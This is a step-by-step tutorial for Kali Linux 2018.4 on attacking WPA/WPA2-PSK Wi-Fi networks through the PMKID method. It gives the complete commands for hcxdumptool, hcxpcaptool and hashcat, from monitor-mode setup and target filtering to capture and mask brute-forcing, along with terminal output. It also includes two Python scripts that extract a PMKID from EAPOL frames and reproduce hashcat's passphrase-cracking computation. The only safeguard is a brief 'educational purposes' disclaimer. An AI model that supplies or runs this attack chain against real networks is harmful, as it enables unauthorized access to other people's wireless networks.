How To Capture WPA/WPA2 PMKID Kali Linux 2018.4

In this guide I will use the new PMKID method to attack WPA/WPA2-PSK, which does not require capturing a full four-way handshake between a client and the access point.

“This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard. WPA3 will be much harder to attack because of its modern key establishment protocol called “Simultaneous Authentication of Equals” (SAE).

The main difference from existing attacks is that in this attack, capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame.”

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.

Step 1: Install Dependencies And Tools

1.1 Install dependencies

sudo apt install libcurl4-openssl-dev libpcap0.8-dev zlib1g-dev libssl-dev

1.2 In order to use the new attack you need the following tools:

Download hcxdumptool, hcxtools and hashcat (clone as your normal user; sudo is only needed for the install step, and cloning as root leaves a root-owned source tree)

git clone https://github.com/ZerBea/hcxdumptool.git

git clone https://github.com/ZerBea/hcxtools.git

git clone https://github.com/hashcat/hashcat.git

1.3 Install hcxdumptool

cd hcxdumptool

1.3.a Build the tool

sudo make

1.3.b Install it

sudo make install

1.4.a Install hcxtools

cd ..
cd hcxtools/

1.4.b Build the tools

sudo make

1.4.c Install them

sudo make install

1.5.a Install hashcat

cd ..
cd hashcat

1.5.b Build hashcat

sudo make

1.5.c Install it

sudo make install

Step 2: Configure Network Card

2.1 Set network card in monitor mode

## Set interface down
sudo ip link set wlan0 down
 
## Set monitor mode
sudo iwconfig wlan0 mode monitor
 
## Set interface up
sudo ip link set wlan0 up

2.2 Confirm monitor mode (ALFA AWUS1900)

sudo iwconfig
root@GalaxyS9:~/hashcat# sudo iwconfig
wlan0     IEEE 802.11  Mode:Monitor  Frequency:2.442 GHz  Tx-Power=30 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
          
lo        no wireless extensions.

eth0      no wireless extensions.

root@GalaxyS9:~/hashcat# 

2.3 Kill the wpa_supplicant for wlan0

sudo wpa_cli terminate wlan0
root@GalaxyS9:~/hashcat# sudo wpa_cli terminate wlan0
Selected interface 'wlan0'
OK
root@GalaxyS9:~/hashcat# 

Step 3: Use Airodump-ng to sniff nearby networks

3.1 Open a new terminal and run airodump-ng to find your target BSSID

sudo airodump-ng wlan0

## Or also write the scan results to a CSV file (the --ivs option is only
## useful for WEP; IVs play no role in a WPA2/PMKID attack)
sudo airodump-ng wlan0 --wps -w /root/Desktop/Dump01 --output-format csv

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID 
84:C9:B2:6A:9E:90  -38       21        3    0   1  130  WPA2 CCMP   PSK  HonnyP01

3.2 Open a new terminal, change to the hashcat directory (the capture and hash files will be kept there) and create a filter list file containing the target BSSID

## Open hashcat directory
cd hashcat/

## Create the filter list and enter the target's BSSID: one MAC per line,
## 12 hex digits without separators
## Target BSSID 84:C9:B2:6A:9E:90 ESSID HonnyP01 Channel 1
## (sudo is not needed here; the redirection is done by your shell, not by sudo)

echo "84C9B26A9E90" > filter.txt

Step 4: Use Hcxdumptool To Catch PMKID From The Target

4.1 Launch hcxdumptool, write the capture to cap01.pcapng, use the filter list in whitelist mode (--filtermode=2) and stay on channel 1, the target's channel. These option names are those of hcxdumptool 5.1.x, the version current for Kali 2018.4; later releases renamed or removed several of them, so check hcxdumptool --help for the version you built.

sudo hcxdumptool -o cap01.pcapng -i wlan0 --filterlist=filter.txt --filtermode=2 --enable_status=1 -c 1
start capturing (stop with ctrl+c)
INTERFACE:...............: wlan0
ERRORMAX.................: 100 errors
FILTERLIST...............: 1 entries
MAC CLIENT...............: e804100a061d
MAC ACCESS POINT.........: 18421de033b8 (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 64358
ANONCE...................: edcf48118ea4f0cfc15bf88ece2f38cad42b2e7b294f1db5d3288c7e477fb3b5

INFO: cha=3, rx=999, rx(dropped)=55, tx=32, powned=0, err=0

Let the tool run for at least 10 minutes. hcxdumptool sends association requests to the target; if the AP accepts one and includes a PMKID in the first EAPOL-Key message, you will see the message "FOUND PMKID". Not every AP does this (it depends on the AP's firmware and configuration); if no PMKID ever appears, this shortcut does not apply to that AP and you need a classic four-way handshake instead.

[16:25:48 - 011] 12acf1e762A4 -> 84C9B26A9E90 <ESSID> [ASSOCIATIONREQUEST, SEQUENCE 4]
[16:25:48 - 011] 84C9B26A9E90-> 12acf1e762A4 [ASSOCIATIONRESPONSE, SEQUENCE 1416]
[16:25:48 - 011] 84C9B26A9E90-> 12acf1e762A4 [FOUND PMKID]

4.2 Run hcxpcaptool to convert the captured pcapng into the hash format hashcat expects (mode 16800). The -E, -I and -U options additionally dump any ESSIDs, EAP identities and usernames seen in the capture to the named files. Note that hcxtools 6.x replaced hcxpcaptool with hcxpcapngtool, which writes the newer combined 22000 format (hashcat -m 22000) instead.

sudo hcxpcaptool -E essidlist -I identitylist -U usernamelist -z cap01.16800 cap01.pcapng
root@GalaxyS9:~/hashcat# sudo hcxpcaptool -E essidlist -I identitylist -U usernamelist -z cap01.16800 cap01.pcapng

reading from cap01.pcapng
                                                
summary:                                        
--------
file name....................: cap01.pcapng
file type....................: pcapng 1.0
file hardware information....: armv7l
file os information..........: Linux 4.14.79-v7+
file application information.: hcxdumptool 5.1.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 81
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 0
WDS packets..................: 2
beacons (with ESSID inside)..: 22
probe requests...............: 22
probe responses..............: 14
association requests.........: 1
association responses........: 1
reassociation responses......: 2
authentications (OPEN SYSTEM): 8
authentications (BROADCOM)...: 8
EAPOL packets................: 8
EAPOL PMKIDs.................: 1
best handshakes..............: 1 (ap-less: 0)

1 PMKID(s) written to cap01.16800
root@GalaxyS9:~/hashcat#

4.3 Validate the hash

The 16800 line has four fields separated by *: the 16-byte PMKID, the AP MAC, the station MAC and the ESSID encoded as hex. Check that the AP MAC matches the BSSID you filtered on; otherwise the capture contains a different network.

cat cap01.16800
root@GalaxyS9:~/hashcat# cat cap01.16800
4a12770f5a10315f7a8a6e9cd311c9ca*1cb72c843c70*b0ca68623d4f*506f6e747553
root@GalaxyS9:~/hashcat# 
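What hcxpcaptool does in step 4.2 and what the line in step 4.3 means, as an added example that is not part of the original guide or of hcxtools: the script below builds a constructed 802.11 data frame carrying EAPOL-Key message 1, walks the LLC/SNAP, EAPOL and key-data layers to find the RSN PMKID KDE (vendor IE 0xdd, OUI 00:0f:ac, type 4), and emits a hashcat 16800 line from the PMKID, the two MACs and the ESSID. The MACs reuse the BSSID and client from this guide, but the PMKID value, ESSID pairing and frame contents are made up for the demo.

```python
"""Pull the PMKID out of EAPOL-Key message 1 and emit a hashcat -m 16800 line.

Added example; this is not hcxpcaptool's code. The frame is constructed
inline, and the PMKID value and frame contents are chosen for the demo.
"""
import struct

LLC_SNAP_EAPOL = bytes.fromhex("aaaa03000000888e")         # LLC/SNAP header, EtherType 0x888e (EAPOL)
PMKID_KDE_HDR = bytes.fromhex("dd14000fac04")              # vendor IE, len 20, OUI 00:0f:ac, type 4 = PMKID
AP_MAC = bytes.fromhex("84c9b26a9e90")                     # constructed: the BSSID used in this guide
STA_MAC = bytes.fromhex("12acf1e762a4")                    # constructed: the client seen in the hcxdumptool log
PMKID = bytes.fromhex("0123456789abcdef0123456789abcdef")  # constructed: not a real PMKID


def build_eapol_m1_frame(ap_mac, sta_mac, pmkid):
    """Constructed 802.11 data frame (AP -> STA) carrying EAPOL-Key message 1.
    pmkid=None builds a frame whose key data holds no PMKID KDE."""
    # 802.11 header: FC 0x0802 = data frame, FromDS; addr1 = DA (STA), addr2 = BSSID, addr3 = SA (AP)
    hdr = b"\x08\x02" + b"\x00\x00" + sta_mac + ap_mac + ap_mac + b"\x10\x00"
    key_data = b"" if pmkid is None else PMKID_KDE_HDR + pmkid
    # EAPOL-Key body: descriptor 2 (RSN), key info 0x008a (version 2, pairwise, ACK), key length 16
    # (CCMP), replay counter, ANonce, key IV, RSC, reserved, MIC (zero in M1), key data length, key data
    body = (struct.pack(">BHHQ", 2, 0x008A, 16, 1) + b"\x11" * 32 + b"\x00" * 16 + b"\x00" * 8
            + b"\x00" * 8 + b"\x00" * 16 + struct.pack(">H", len(key_data)) + key_data)
    eapol = struct.pack(">BBH", 2, 3, len(body))           # 802.1X v2, packet type 3 = EAPOL-Key
    return hdr + LLC_SNAP_EAPOL + eapol + body


def extract_pmkid(frame):
    """Return (ap_mac, sta_mac, pmkid) if the frame is EAPOL-Key message 1 with a
    non-zero PMKID KDE, else None."""
    if len(frame) < 24 or (frame[0] & 0x0C) != 0x08:      # type bits must say "data frame"
        return None
    to_ds, from_ds = frame[1] & 0x01, frame[1] & 0x02
    addr1, addr2 = frame[4:10], frame[10:16]
    if from_ds and not to_ds:                              # AP -> STA: the direction of message 1
        ap_mac, sta_mac = addr2, addr1
    elif to_ds and not from_ds:                            # STA -> AP (message 2/4 direction)
        ap_mac, sta_mac = addr1, addr2
    else:
        return None
    off = 24 + (2 if frame[0] & 0x80 else 0)               # QoS data carries a 2-byte QoS control field
    if frame[off:off + 8] != LLC_SNAP_EAPOL:
        return None
    off += 8
    if len(frame) < off + 4 or frame[off + 1] != 3:        # EAPOL packet type 3 = EAPOL-Key
        return None
    body_len = struct.unpack(">H", frame[off + 2:off + 4])[0]
    body = frame[off + 4:off + 4 + body_len]
    if len(body) < 95 or body[0] != 2:                     # descriptor type 2 = RSN
        return None
    key_info = struct.unpack(">H", body[1:3])[0]
    if not (key_info & 0x0080) or (key_info & 0x0100):     # message 1: ACK set, MIC bit clear
        return None
    kd_len = struct.unpack(">H", body[93:95])[0]
    kd = body[95:95 + kd_len]
    i = 0
    while i + 2 <= len(kd):                                # walk the key-data TLVs
        t, l = kd[i], kd[i + 1]
        v = kd[i + 2:i + 2 + l]
        if t == 0xDD and l >= 20 and v[:4] == b"\x00\x0f\xac\x04":
            pmkid = v[4:20]
            if pmkid != b"\x00" * 16:                      # some APs send an all-zero PMKID; useless
                return ap_mac, sta_mac, pmkid
        i += 2 + l
    return None


def to_16800(ap_mac, sta_mac, pmkid, essid):
    """hashcat 16800 format: PMKID*MAC_AP*MAC_STA*ESSID(hex)."""
    return f"{pmkid.hex()}*{ap_mac.hex()}*{sta_mac.hex()}*{essid.encode().hex()}"


if __name__ == "__main__":
    found = extract_pmkid(build_eapol_m1_frame(AP_MAC, STA_MAC, PMKID))
    print(to_16800(*found, "HonnyP01"))
```

The all-zero check mirrors why a FOUND PMKID message does not always yield a usable hash: the KDE can be present but empty, and nothing can be recovered from it.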

4.4 Crack the PMKID hash with hashcat

-m 16800 selects WPA-PMKID-PBKDF2, -a 3 is a mask (brute-force) attack and -w 3 a high workload profile. The mask tries six lowercase letters followed by the literal characters t!, eight characters in total, which is the minimum length of a WPA passphrase.

./hashcat -m 16800 cap01.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: 9ba69e3487f514214f1e0fa61ab78fb1*08863bdd2c95*a46cf...323464
Time.Started.....: Sun Dec 23 22:02:53 2018 (3 mins, 2 secs)
Time.Estimated...: Sun Dec 23 22:20:42 2018 (14 mins, 47 secs)
Guess.Mask.......: '?l?l?l?l?l?lt!' [10]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   289.5 kH/s (51.84ms) @ Accel:256 Loops:64 Thr:256 Vec:1
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 52101120/308915776 (16.87%)
Rejected.........: 0/52101120 (0.00%)
Restore.Point....: 52101120/308915776 (16.87%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:3456-3520
Candidates.#1....: 'lwybcot!' -> 'yymytht!'
Hardware.Mon.#1..: Temp: 77c Fan: 55% Util: 99% Core:1822MHz Mem:4006MHz Bus:16
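The computation hashcat performs for every candidate in step 4.4, as an added example that is not part of the original guide or of hashcat: PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes), PMKID = HMAC-SHA1(PMK, "PMK Name" || MAC_AP || MAC_STA) truncated to 16 bytes, compared against the value in the 16800 line. The script parses the hash line from step 4.3 (whose ESSID field decodes to "PontuS"; its passphrase is not known here), expands a hashcat-style mask, and recovers the passphrase of a demo target that is constructed inline with the made-up passphrase "HonnyP042". Candidates shorter than 8 or longer than 63 characters are skipped, which is also what hashcat's "Rejected" counter reflects.

```python
"""Offline PMKID check: what hashcat -m 16800 does for each candidate passphrase.

Added example, not hashcat's code. The demo target line is constructed
here from a made-up passphrase; PAGE_LINE is the hash shown in the guide.
"""
import hashlib
import hmac
import itertools
import string

PAGE_LINE = "4a12770f5a10315f7a8a6e9cd311c9ca*1cb72c843c70*b0ca68623d4f*506f6e747553"

# hashcat's built-in charsets for mask attacks
MASK_CLASSES = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",
}


def parse_16800(line):
    """Split PMKID*MAC_AP*MAC_STA*ESSID(hex) into raw bytes."""
    pmkid, ap, sta, essid = line.strip().split("*")
    return bytes.fromhex(pmkid), bytes.fromhex(ap), bytes.fromhex(sta), bytes.fromhex(essid)


def pmk_from_passphrase(passphrase, essid):
    """WPA2-Personal PMK: PBKDF2-HMAC-SHA1, 4096 rounds, 256-bit output (this is the slow part)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid, 4096, 32)


def pmkid_from_pmk(pmk, ap_mac, sta_mac):
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA)."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def expand_mask(mask):
    """Expand a hashcat-style mask: ?l ?u ?d ?s are charsets, ?? is a literal '?',
    every other character is a literal. Yields candidates lazily."""
    sets = []
    i = 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            c = mask[i + 1]
            sets.append("?" if c == "?" else MASK_CLASSES[c])
            i += 2
        else:
            sets.append(mask[i])
            i += 1
    for combo in itertools.product(*sets):
        yield "".join(combo)


def crack(line, candidates):
    """Return the first candidate whose derived PMKID matches the line, else None."""
    pmkid, ap_mac, sta_mac, essid = parse_16800(line)
    for pw in candidates:
        if not 8 <= len(pw) <= 63:          # WPA passphrase length limits; such candidates are rejected
            continue
        guess = pmkid_from_pmk(pmk_from_passphrase(pw, essid), ap_mac, sta_mac)
        if hmac.compare_digest(guess, pmkid):
            return pw
    return None


def make_line(passphrase, essid, ap_mac, sta_mac):
    """Build a 16800 line for a known passphrase (used only to construct the demo target)."""
    pmkid = pmkid_from_pmk(pmk_from_passphrase(passphrase, essid.encode()), ap_mac, sta_mac)
    return f"{pmkid.hex()}*{ap_mac.hex()}*{sta_mac.hex()}*{essid.encode().hex()}"


# Constructed demo target: ESSID and BSSID from the guide, made-up client MAC and passphrase.
DEMO_LINE = make_line("HonnyP042", "HonnyP01",
                      bytes.fromhex("84c9b26a9e90"), bytes.fromhex("12acf1e762a4"))

if __name__ == "__main__":
    print("page hash ESSID:", parse_16800(PAGE_LINE)[3].decode())
    print("demo target cracked:", crack(DEMO_LINE, expand_mask("HonnyP0?d?d")))
```

Because the PMKID is bound to the ESSID through PBKDF2, a hash line is only valid for the network whose ESSID is in its last field; the same passphrase on a differently named network produces a different PMK and therefore a different PMKID.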

For a more detailed guide on hashcat, see the guide on using hashcat on Windows.
